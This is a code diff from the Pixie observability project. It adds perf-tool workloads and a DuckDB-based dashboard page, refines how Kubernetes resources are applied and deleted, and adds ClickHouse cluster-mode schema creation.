+ } + return exps +} diff --git a/src/e2e_test/perf_tool/pkg/suites/workloads.go b/src/e2e_test/perf_tool/pkg/suites/workloads.go index e0679e5cfb8..dd91bc02715 100644 --- a/src/e2e_test/perf_tool/pkg/suites/workloads.go +++ b/src/e2e_test/perf_tool/pkg/suites/workloads.go @@ -30,6 +30,32 @@ import ( pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" ) +// VizierReleaseWorkload returns the workload spec to deploy a released version of Vizier via `px deploy`. +// This skips the skaffold build step, using pre-built images from the Pixie release. +func VizierReleaseWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "vizier", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Px{ + Px: &pb.PxCLIDeploy{ + Args: []string{ + "deploy", + }, + SetClusterID: true, + Namespaces: []string{ + "pl", + "px-operator", + "olm", + }, + }, + }, + }, + }, + Healthchecks: VizierHealthChecks(), + } +} + // VizierWorkload returns the workload spec to deploy Vizier. func VizierWorkload() *pb.WorkloadSpec { return &pb.WorkloadSpec{ @@ -189,6 +215,36 @@ func OnlineBoutiqueWorkload() *pb.WorkloadSpec { } } +// ClickHouseReadLoadWorkload deploys the (future) skaffold application that +// generates sustained ClickHouse read traffic alongside the Pixie read +// experiment. The skaffold path below is a placeholder; wire up the real +// application once it exists in the tree. +func ClickHouseReadLoadWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "clickhouse-read-load", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Skaffold{ + Skaffold: &pb.SkaffoldDeploy{ + // TODO(ddelnano): replace with the real skaffold path once + // the ClickHouse read-load generator app lands. + SkaffoldPath: "src/e2e_test/clickhouse_read_load/skaffold.yaml", + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "px-clickhouse-read-load", + }, + }, + }, + }, + } +} + // KafkaWorkload returns the WorkloadSpec to deploy the kafka demo. func KafkaWorkload() *pb.WorkloadSpec { return &pb.WorkloadSpec{ diff --git a/src/e2e_test/perf_tool/ui/index.html b/src/e2e_test/perf_tool/ui/index.html new file mode 100644 index 00000000000..e57432b207e --- /dev/null +++ b/src/e2e_test/perf_tool/ui/index.html @@ -0,0 +1,1215 @@ + + + + + + Pixie Perf Tool Dashboard + + + + +
+

Pixie Perf Tool Dashboard

+ DuckDB WASM + Parquet +
+ +
Initializing DuckDB...
+ +
+ +
+

Data Source

+
+
+
+

Drop parquet files here or click to browse

+

results_*.parquet and spec.parquet files

+ +
+
+
OR
+
+
+ + + + + + + +

+ Bucket must be publicly readable or have CORS configured. +

+
+
+
+
+
+ + + +
+ + + + diff --git a/src/e2e_test/protocol_loadtest/skaffold_client.yaml b/src/e2e_test/protocol_loadtest/skaffold_client.yaml index 3939defe219..a85de725773 100644 --- a/src/e2e_test/protocol_loadtest/skaffold_client.yaml +++ b/src/e2e_test/protocol_loadtest/skaffold_client.yaml @@ -7,6 +7,8 @@ build: context: . bazel: target: //src/e2e_test/protocol_loadtest/client:protocol_loadtest_client_image.tar + args: + - --config=x86_64_sysroot tagPolicy: dateTime: {} local: diff --git a/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml b/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml index f6d25ba9ed6..87b38a59ee1 100644 --- a/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml +++ b/src/e2e_test/protocol_loadtest/skaffold_loadtest.yaml @@ -7,6 +7,8 @@ build: context: . bazel: target: //src/e2e_test/protocol_loadtest:protocol_loadtest_server_image.tar + args: + - --config=x86_64_sysroot tagPolicy: dateTime: {} local: diff --git a/src/utils/shared/k8s/apply.go b/src/utils/shared/k8s/apply.go index c25858ce6d7..0a5e4100dea 100644 --- a/src/utils/shared/k8s/apply.go +++ b/src/utils/shared/k8s/apply.go @@ -30,6 +30,7 @@ import ( "strings" log "github.com/sirupsen/logrus" + "k8s.io/apimachinery/pkg/api/meta" k8serrors "k8s.io/apimachinery/pkg/api/errors" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" @@ -235,8 +236,15 @@ func ApplyResources(clientset kubernetes.Interface, config *rest.Config, resourc } nsRes := res.Namespace(objNS) + // Use the rest mapping's scope to decide between cluster- and + // namespace-scoped client paths. The previous implementation kept a + // hardcoded allowlist of cluster-scoped kinds and tried to namespace- + // qualify everything else, which produced "the server could not find + // the requested resource" 404s for any cluster-scoped resource not + // in the list (e.g. APIService, PriorityClass, or cluster-scoped CRs + // like RuntimeRuleAlertBinding). createRes := nsRes - if k8sRes == "validatingwebhookconfigurations" || k8sRes == "mutatingwebhookconfigurations" || k8sRes == "namespaces" || k8sRes == "configmap" || k8sRes == "clusterrolebindings" || k8sRes == "clusterroles" || k8sRes == "customresourcedefinitions" { + if mapping.Scope != nil && mapping.Scope.Name() == meta.RESTScopeNameRoot { createRes = res } diff --git a/src/utils/shared/k8s/delete.go b/src/utils/shared/k8s/delete.go index 3adb2c8b986..689e0f8be54 100644 --- a/src/utils/shared/k8s/delete.go +++ b/src/utils/shared/k8s/delete.go @@ -29,7 +29,9 @@ import ( "k8s.io/apimachinery/pkg/api/errors" "k8s.io/apimachinery/pkg/api/meta" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" "k8s.io/apimachinery/pkg/runtime" + "k8s.io/apimachinery/pkg/runtime/schema" "k8s.io/apimachinery/pkg/util/sets" "k8s.io/cli-runtime/pkg/genericclioptions" "k8s.io/cli-runtime/pkg/printers" @@ -44,6 +46,12 @@ import ( cmdwait "k8s.io/kubectl/pkg/cmd/wait" ) +var apiServiceGVR = schema.GroupVersionResource{ + Group: "apiregistration.k8s.io", + Version: "v1", + Resource: "apiservices", +} + // ObjectDeleter has methods to delete K8s objects and wait for them. This code is adopted from `kubectl delete`. type ObjectDeleter struct { Namespace string @@ -110,6 +118,32 @@ func (o *ObjectDeleter) DeleteNamespace() error { return err } +// getAggregatedGroupVersions returns the set of group/versions that are served +// by an aggregated APIService (spec.service is non-nil). Resources in those +// groups are skipped during cluster-wide deletion sweeps because aggregated +// servers frequently advertise the delete verb on read-only virtual resources +// and fail the call with "operation not supported". +func (o *ObjectDeleter) getAggregatedGroupVersions() (sets.String, error) { + out := sets.NewString() + list, err := o.dynamicClient.Resource(apiServiceGVR).List(context.TODO(), metav1.ListOptions{}) + if err != nil { + if errors.IsNotFound(err) || meta.IsNoMatchError(err) { + return out, nil + } + return nil, err + } + for _, item := range list.Items { + svc, found, err := unstructured.NestedMap(item.Object, "spec", "service") + if err != nil || !found || svc == nil { + continue + } + group, _, _ := unstructured.NestedString(item.Object, "spec", "group") + version, _, _ := unstructured.NestedString(item.Object, "spec", "version") + out.Insert(schema.GroupVersion{Group: group, Version: version}.String()) + } + return out, nil +} + func (o *ObjectDeleter) getDeletableResourceTypes() ([]string, error) { discoveryClient, err := o.rcg.ToDiscoveryClient() if err != nil { @@ -121,11 +155,19 @@ func (o *ObjectDeleter) getDeletableResourceTypes() ([]string, error) { return nil, err } + aggregated, err := o.getAggregatedGroupVersions() + if err != nil { + return nil, err + } + resources := []string{} for _, list := range lists { if len(list.APIResources) == 0 { continue } + if aggregated.Has(list.GroupVersion) { + continue + } for _, resource := range list.APIResources { if len(resource.Verbs) == 0 { @@ -145,6 +187,9 @@ func (o *ObjectDeleter) DeleteByLabel(selector string, resourceKinds ...string) if err := o.initRestClientGetter(); err != nil { return 0, err } + if err := o.initDynamicClient(); err != nil { + return 0, err + } b := resource.NewBuilder(o.rcg) if len(resourceKinds) == 0 { @@ -169,9 +214,6 @@ func (o *ObjectDeleter) DeleteByLabel(selector string, resourceKinds ...string) if err != nil { return 0, err } - if err := o.initDynamicClient(); err != nil { - return 0, err - } return o.runDelete(r) } diff --git a/src/vizier/funcs/md_udtfs/md_udtfs_impl.h b/src/vizier/funcs/md_udtfs/md_udtfs_impl.h index ff5fdcbe6c2..9b1d9936df3 100644 --- a/src/vizier/funcs/md_udtfs/md_udtfs_impl.h +++ b/src/vizier/funcs/md_udtfs/md_udtfs_impl.h @@ -1145,12 +1145,17 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF("database", "ClickHouse database", "'default'"), UDTFArg::Make( - "use_if_not_exists", "Whether to use IF NOT EXISTS in CREATE TABLE statements", true)); + "use_if_not_exists", "Whether to use IF NOT EXISTS in CREATE TABLE statements", true), + UDTFArg::Make( + "cluster_name", + "ClickHouse cluster name for ON CLUSTER DDL and ReplicatedMergeTree engine. " + "Empty string disables cluster mode.", + "''")); } Status Init(FunctionContext*, types::StringValue host, types::Int64Value port, types::StringValue username, types::StringValue password, types::StringValue database, - types::BoolValue use_if_not_exists) { + types::BoolValue use_if_not_exists, types::StringValue cluster_name) { // Store ClickHouse connection parameters host_ = std::string(host); port_ = port.val; @@ -1158,6 +1163,7 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTFExecute(absl::Substitute("DROP TABLE IF EXISTS $0", table_name)); + std::string drop_cluster_clause = + cluster_name_.empty() ? "" : absl::Substitute(" ON CLUSTER '$0'", cluster_name_); + clickhouse_client_->Execute( + absl::Substitute("DROP TABLE IF EXISTS $0$1", table_name, drop_cluster_clause)); } // Create new table @@ -1276,7 +1286,8 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF column_defs; // Add columns from schema @@ -1301,14 +1312,21 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF= 22.x). + std::string engine = cluster_name.empty() ? "MergeTree()" : "ReplicatedMergeTree()"; std::string create_sql = absl::Substitute(R"( - CREATE TABLE $0$1 ( - $2 - ) ENGINE = MergeTree() + CREATE TABLE $0$1$2 ( + $3 + ) ENGINE = $4 PARTITION BY toYYYYMM(event_time) ORDER BY (hostname, event_time) )", - if_not_exists_clause, table_name, columns_str); + if_not_exists_clause, table_name, on_cluster_clause, + columns_str, engine); return create_sql; } @@ -1326,6 +1344,7 @@ class CreateClickHouseSchemas final : public carnot::udf::UDTF